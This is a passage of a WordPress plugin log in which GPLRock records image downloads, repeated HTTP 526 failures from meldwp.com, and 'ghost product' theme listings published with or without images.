saasten-saas-software-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:48:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasten---saas--software-landing-wordpress-theme-24119.webp for product saasten-saas-software-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:48:57 UTC] GPLRock: Image download failed for product saasten-saas-software-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:48:59 UTC] GPLRock: Image download failed for product saasten-saas-software-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasten---saas--software-landing-wordpress-theme-24119.webp for product saasten-saas-software-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:01 UTC] GPLRock WARNING: Image download failed for product saasten-saas-software-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saasten---saas--software-landing-wordpress-theme-24119.webp [04-Apr-2026 09:49:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saasten-saas-software-landing-wordpress-theme [04-Apr-2026 09:49:01 UTC] GPLRock: Image downloaded successfully for product alchemists-sports-esports-gaming-club-and-news-html-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98b5dead.webp [04-Apr-2026 09:49:01 UTC] GPLRock: Using pre-downloaded image for product alchemists-sports-esports-gaming-club-and-news-html-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98b5dead.webp [04-Apr-2026 09:49:01 UTC] GPLRock: Ghost product published with image - Product ID: alchemists-sports-esports-gaming-club-and-news-html-template [04-Apr-2026 09:49:01 UTC] GPLRock: Image download failed for product perukar-barber-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:03 UTC] GPLRock: Image download failed for product perukar-barber-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perukar---barber-wordpress-theme-6542.webp for product perukar-barber-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:06 UTC] GPLRock: Image download failed for product perukar-barber-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:08 UTC] GPLRock: Image download failed for product perukar-barber-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perukar---barber-wordpress-theme-6542.webp for product perukar-barber-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:10 UTC] GPLRock WARNING: Image download failed for product perukar-barber-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/perukar---barber-wordpress-theme-6542.webp [04-Apr-2026 09:49:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: perukar-barber-wordpress-theme [04-Apr-2026 09:49:10 UTC] GPLRock: Image download failed for product gen-ai-ai-agency-technology-startup-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:12 UTC] GPLRock: Image download failed for product gen-ai-ai-agency-technology-startup-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gen-ai---ai-agency--technology-startup-elementor-wordpress-theme-12317.webp for product gen-ai-ai-agency-technology-startup-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:15 UTC] GPLRock: Image download failed for product gen-ai-ai-agency-technology-startup-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:17 UTC] GPLRock: Image download failed for product gen-ai-ai-agency-technology-startup-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gen-ai---ai-agency--technology-startup-elementor-wordpress-theme-12317.webp for product gen-ai-ai-agency-technology-startup-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:19 UTC] GPLRock WARNING: Image download failed for product gen-ai-ai-agency-technology-startup-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gen-ai---ai-agency--technology-startup-elementor-wordpress-theme-12317.webp [04-Apr-2026 09:49:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gen-ai-ai-agency-technology-startup-elementor-wordpress-theme [04-Apr-2026 09:49:19 UTC] GPLRock: Image download failed for product salient-creative-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:21 UTC] GPLRock: Image download failed for product salient-creative-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salient--creative-multipurpose--woocommerce-theme-10135.webp for product salient-creative-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:23 UTC] GPLRock: Image download failed for product salient-creative-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:25 UTC] GPLRock: Image download failed for product salient-creative-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salient--creative-multipurpose--woocommerce-theme-10135.webp for product salient-creative-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:28 UTC] GPLRock WARNING: Image download failed for product salient-creative-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/salient--creative-multipurpose--woocommerce-theme-10135.webp [04-Apr-2026 09:49:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: salient-creative-multipurpose-woocommerce-theme [04-Apr-2026 09:49:28 UTC] GPLRock: Image download failed for product essence-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:30 UTC] GPLRock: Image download failed for product essence-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essence---wordpress-blog-theme-3312.webp for product essence-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:32 UTC] GPLRock: Image download failed for product essence-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:34 UTC] GPLRock: Image download failed for product essence-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essence---wordpress-blog-theme-3312.webp for product essence-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:36 UTC] GPLRock WARNING: Image download failed for product essence-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/essence---wordpress-blog-theme-3312.webp [04-Apr-2026 09:49:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: essence-wordpress-blog-theme [04-Apr-2026 09:49:36 UTC] GPLRock: Image download failed for product conult-consulting-business-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:38 UTC] GPLRock: Image download failed for product conult-consulting-business-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conult---consulting-business-wordpress-themes-17994.webp for product conult-consulting-business-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:41 UTC] GPLRock: Image download failed for product conult-consulting-business-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:43 UTC] GPLRock: Image download failed for product conult-consulting-business-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conult---consulting-business-wordpress-themes-17994.webp for product conult-consulting-business-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:45 UTC] GPLRock WARNING: Image download failed for product conult-consulting-business-wordpress-themes. URL: https://meldwp.com/wp-content/uploads/conult---consulting-business-wordpress-themes-17994.webp [04-Apr-2026 09:49:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: conult-consulting-business-wordpress-themes [04-Apr-2026 09:49:45 UTC] GPLRock: Image download failed for product dezily-cardiology-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:47 UTC] GPLRock: Image download failed for product dezily-cardiology-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dezily---cardiology-medical-wordpress-theme-4426.webp for product dezily-cardiology-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:49 UTC] GPLRock: Image download failed for product dezily-cardiology-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:51 UTC] GPLRock: Image download failed for product dezily-cardiology-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dezily---cardiology-medical-wordpress-theme-4426.webp for product dezily-cardiology-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:54 UTC] GPLRock WARNING: Image download failed for product dezily-cardiology-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dezily---cardiology-medical-wordpress-theme-4426.webp [04-Apr-2026 09:49:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dezily-cardiology-medical-wordpress-theme [04-Apr-2026 09:49:54 UTC] GPLRock: Image download failed for product amwerk-industry-corporate-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:56 UTC] GPLRock: Image download failed for product amwerk-industry-corporate-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:49:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amwerk---industry--corporate-business-wordpress-theme-22285.webp for product amwerk-industry-corporate-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:49:58 UTC] GPLRock: Image download failed for product amwerk-industry-corporate-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:50:00 UTC] GPLRock: Image download failed for product amwerk-industry-corporate-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 09:50:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amwerk---industry--corporate-business-wordpress-theme-22285.webp for product amwerk-industry-corporate-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 09:50:02 UTC] GPLRock WARNING: Image download failed for product amwerk-industry-corporate-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amwerk---industry--corporate-business-wordpress-theme-22285.webp [04-Apr-2026 09:50:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amwerk-industry-corporate-business-wordpress-theme [04-Apr-2026 11:01:37 UTC] GPLRock: Image downloaded successfully for product sputnik-social-media-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7df94f5.webp [04-Apr-2026 11:01:37 UTC] GPLRock: Using pre-downloaded image for product sputnik-social-media-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7df94f5.webp [04-Apr-2026 11:01:37 UTC] GPLRock: Ghost product published with image - Product ID: sputnik-social-media-marketing-elementor-template-kit [04-Apr-2026 11:01:38 UTC] GPLRock: Image downloaded successfully for product spring-watercolor-and-floral-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f28bc0e.webp [04-Apr-2026 11:01:39 UTC] GPLRock: Using pre-downloaded image for product spring-watercolor-and-floral-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f28bc0e.webp [04-Apr-2026 11:01:39 UTC] GPLRock: Ghost product published with image - Product ID: spring-watercolor-and-floral-template-kit [04-Apr-2026 11:01:40 UTC] GPLRock: Image downloaded successfully for product splendid-drone-photography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bfd813fe.webp [04-Apr-2026 11:01:40 UTC] GPLRock: Using pre-downloaded image for product splendid-drone-photography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bfd813fe.webp [04-Apr-2026 11:01:40 UTC] GPLRock: Ghost product published with image - Product ID: splendid-drone-photography-elementor-template-kit [04-Apr-2026 11:01:41 UTC] GPLRock: Image downloaded successfully for product speedia-autoparts-accessories-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9210c1f.webp [04-Apr-2026 11:01:42 UTC] GPLRock: Using pre-downloaded image for product speedia-autoparts-accessories-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9210c1f.webp [04-Apr-2026 11:01:42 UTC] GPLRock: Ghost product published with image - Product ID: speedia-autoparts-accessories-elementor-template-kit [04-Apr-2026 11:01:43 UTC] GPLRock: Image downloaded successfully for product speakup-language-course-translation-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f37a52a3.webp [04-Apr-2026 11:01:43 UTC] GPLRock: Using pre-downloaded image for product speakup-language-course-translation-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f37a52a3.webp [04-Apr-2026 11:01:43 UTC] GPLRock: Ghost product published with image - Product ID: speakup-language-course-translation-service-elementor-template-kit [04-Apr-2026 11:01:45 UTC] GPLRock: Image downloaded successfully for product speaktron-public-speaker-life-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b643f272.jpg [04-Apr-2026 11:01:45 UTC] GPLRock: Using pre-downloaded image for product speaktron-public-speaker-life-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b643f272.jpg [04-Apr-2026 11:01:45 UTC] GPLRock: Ghost product published with image - Product ID: speaktron-public-speaker-life-coach-elementor-template-kit [04-Apr-2026 11:01:46 UTC] GPLRock: Image downloaded successfully for product spatoo-modern-shoes-ecommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96009225.webp [04-Apr-2026 11:01:46 UTC] GPLRock: Using pre-downloaded image for product spatoo-modern-shoes-ecommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96009225.webp [04-Apr-2026 11:01:47 UTC] GPLRock: Ghost product published with image - Product ID: spatoo-modern-shoes-ecommerce-elementor-template-kit [04-Apr-2026 11:01:48 UTC] GPLRock: Image downloaded successfully for product sparxup-saas-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e48a75c.webp [04-Apr-2026 11:01:48 UTC] GPLRock: Using pre-downloaded image for product sparxup-saas-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e48a75c.webp [04-Apr-2026 11:01:48 UTC] GPLRock: Ghost product published with image - Product ID: sparxup-saas-startup-elementor-template-kit [04-Apr-2026 11:01:50 UTC] GPLRock: Image downloaded successfully for product spacehub-coworking-creative-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5f0b993.jpg [04-Apr-2026 11:01:50 UTC] GPLRock: Using pre-downloaded image for product spacehub-coworking-creative-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5f0b993.jpg [04-Apr-2026 11:01:50 UTC] GPLRock: Ghost product published with image - Product ID: spacehub-coworking-creative-space-elementor-template-kit [04-Apr-2026 11:01:51 UTC] GPLRock: Image downloaded successfully for product space-beauty-salon-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f986a6d1.jpg [04-Apr-2026 11:01:52 UTC] GPLRock: Using pre-downloaded image for product space-beauty-salon-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f986a6d1.jpg [04-Apr-2026 11:01:52 UTC] GPLRock: Ghost product published with image - Product ID: space-beauty-salon-elementor-template-kit [04-Apr-2026 11:10:37 UTC] GPLRock: Image download failed for product entourage-moviefilmcinematv-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:39 UTC] GPLRock: Image download failed for product entourage-moviefilmcinematv-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/entourage---moviefilmcinematv-wordpress-theme-576.webp for product entourage-moviefilmcinematv-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:10:41 UTC] GPLRock: Image download failed for product entourage-moviefilmcinematv-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:43 UTC] GPLRock: Image download failed for product entourage-moviefilmcinematv-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/entourage---moviefilmcinematv-wordpress-theme-576.webp for product entourage-moviefilmcinematv-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:10:45 UTC] GPLRock WARNING: Image download failed for product entourage-moviefilmcinematv-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/entourage---moviefilmcinematv-wordpress-theme-576.webp [04-Apr-2026 11:10:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: entourage-moviefilmcinematv-wordpress-theme [04-Apr-2026 11:10:45 UTC] GPLRock: Image download failed for product blush-a-trendy-beauty-and-lifestyle-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:48 UTC] GPLRock: Image download failed for product blush-a-trendy-beauty-and-lifestyle-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blush---a-trendy-beauty-and-lifestyle-wordpress-theme-10617.webp for product blush-a-trendy-beauty-and-lifestyle-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:10:50 UTC] GPLRock: Image download failed for product blush-a-trendy-beauty-and-lifestyle-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:52 UTC] GPLRock: Image download failed for product blush-a-trendy-beauty-and-lifestyle-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blush---a-trendy-beauty-and-lifestyle-wordpress-theme-10617.webp for product blush-a-trendy-beauty-and-lifestyle-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:10:54 UTC] GPLRock WARNING: Image download failed for product blush-a-trendy-beauty-and-lifestyle-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blush---a-trendy-beauty-and-lifestyle-wordpress-theme-10617.webp [04-Apr-2026 11:10:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blush-a-trendy-beauty-and-lifestyle-wordpress-theme [04-Apr-2026 11:10:54 UTC] GPLRock: Image download failed for product porto-multipurpose-website-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:56 UTC] GPLRock: Image download failed for product porto-multipurpose-website-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:10:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/porto---multipurpose-website-template-13461.webp for product porto-multipurpose-website-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:10:58 UTC] GPLRock: Image download failed for product porto-multipurpose-website-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:01 UTC] GPLRock: Image download failed for product porto-multipurpose-website-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/porto---multipurpose-website-template-13461.webp for product porto-multipurpose-website-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:03 UTC] GPLRock WARNING: Image download failed for product porto-multipurpose-website-template. URL: https://meldwp.com/wp-content/uploads/porto---multipurpose-website-template-13461.webp [04-Apr-2026 11:11:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: porto-multipurpose-website-template [04-Apr-2026 11:11:03 UTC] GPLRock: Image download failed for product chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:05 UTC] GPLRock: Image download failed for product chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chiroheal---chiropractor--physiotherapy-wellness-wordpress-theme-12673.webp for product chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:07 UTC] GPLRock: Image download failed for product chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:09 UTC] GPLRock: Image download failed for product chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chiroheal---chiropractor--physiotherapy-wellness-wordpress-theme-12673.webp for product chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:11 UTC] GPLRock WARNING: Image download failed for product chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/chiroheal---chiropractor--physiotherapy-wellness-wordpress-theme-12673.webp [04-Apr-2026 11:11:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chiroheal-chiropractor-physiotherapy-wellness-wordpress-theme [04-Apr-2026 11:11:11 UTC] GPLRock: Image download failed for product magnar-elementor-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:14 UTC] GPLRock: Image download failed for product magnar-elementor-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magnar---elementor-agency-wordpress-theme-27696.webp for product magnar-elementor-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:16 UTC] GPLRock: Image download failed for product magnar-elementor-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:18 UTC] GPLRock: Image download failed for product magnar-elementor-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magnar---elementor-agency-wordpress-theme-27696.webp for product magnar-elementor-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:20 UTC] GPLRock WARNING: Image download failed for product magnar-elementor-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/magnar---elementor-agency-wordpress-theme-27696.webp [04-Apr-2026 11:11:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: magnar-elementor-agency-wordpress-theme [04-Apr-2026 11:11:20 UTC] GPLRock: Image download failed for product classyshop-wp-elementor-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:23 UTC] GPLRock: Image download failed for product classyshop-wp-elementor-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/classyshop-wp---elementor-woocommerce-responsive-theme-25055.webp for product classyshop-wp-elementor-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:25 UTC] GPLRock: Image download failed for product classyshop-wp-elementor-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:27 UTC] GPLRock: Image download failed for product classyshop-wp-elementor-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/classyshop-wp---elementor-woocommerce-responsive-theme-25055.webp for product classyshop-wp-elementor-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:29 UTC] GPLRock WARNING: Image download failed for product classyshop-wp-elementor-woocommerce-responsive-theme. URL: https://meldwp.com/wp-content/uploads/classyshop-wp---elementor-woocommerce-responsive-theme-25055.webp [04-Apr-2026 11:11:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: classyshop-wp-elementor-woocommerce-responsive-theme [04-Apr-2026 11:11:29 UTC] GPLRock: Image download failed for product f8-nextgen-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:31 UTC] GPLRock: Image download failed for product f8-nextgen-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/f8---nextgen-photography-wordpress-theme-17992.webp for product f8-nextgen-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:33 UTC] GPLRock: Image download failed for product f8-nextgen-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:36 UTC] GPLRock: Image download failed for product f8-nextgen-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/f8---nextgen-photography-wordpress-theme-17992.webp for product f8-nextgen-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:38 UTC] GPLRock WARNING: Image download failed for product f8-nextgen-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/f8---nextgen-photography-wordpress-theme-17992.webp [04-Apr-2026 11:11:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: f8-nextgen-photography-wordpress-theme [04-Apr-2026 11:11:38 UTC] GPLRock: Image download failed for product eight-responsive-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:40 UTC] GPLRock: Image download failed for product eight-responsive-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eight---responsive-portfolio-wordpress-theme-8648.webp for product eight-responsive-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:42 UTC] GPLRock: Image download failed for product eight-responsive-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:44 UTC] GPLRock: Image download failed for product eight-responsive-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:11:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eight---responsive-portfolio-wordpress-theme-8648.webp for product eight-responsive-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:11:46 UTC] GPLRock WARNING: Image download failed for product eight-responsive-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eight---responsive-portfolio-wordpress-theme-8648.webp [04-Apr-2026 11:11:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 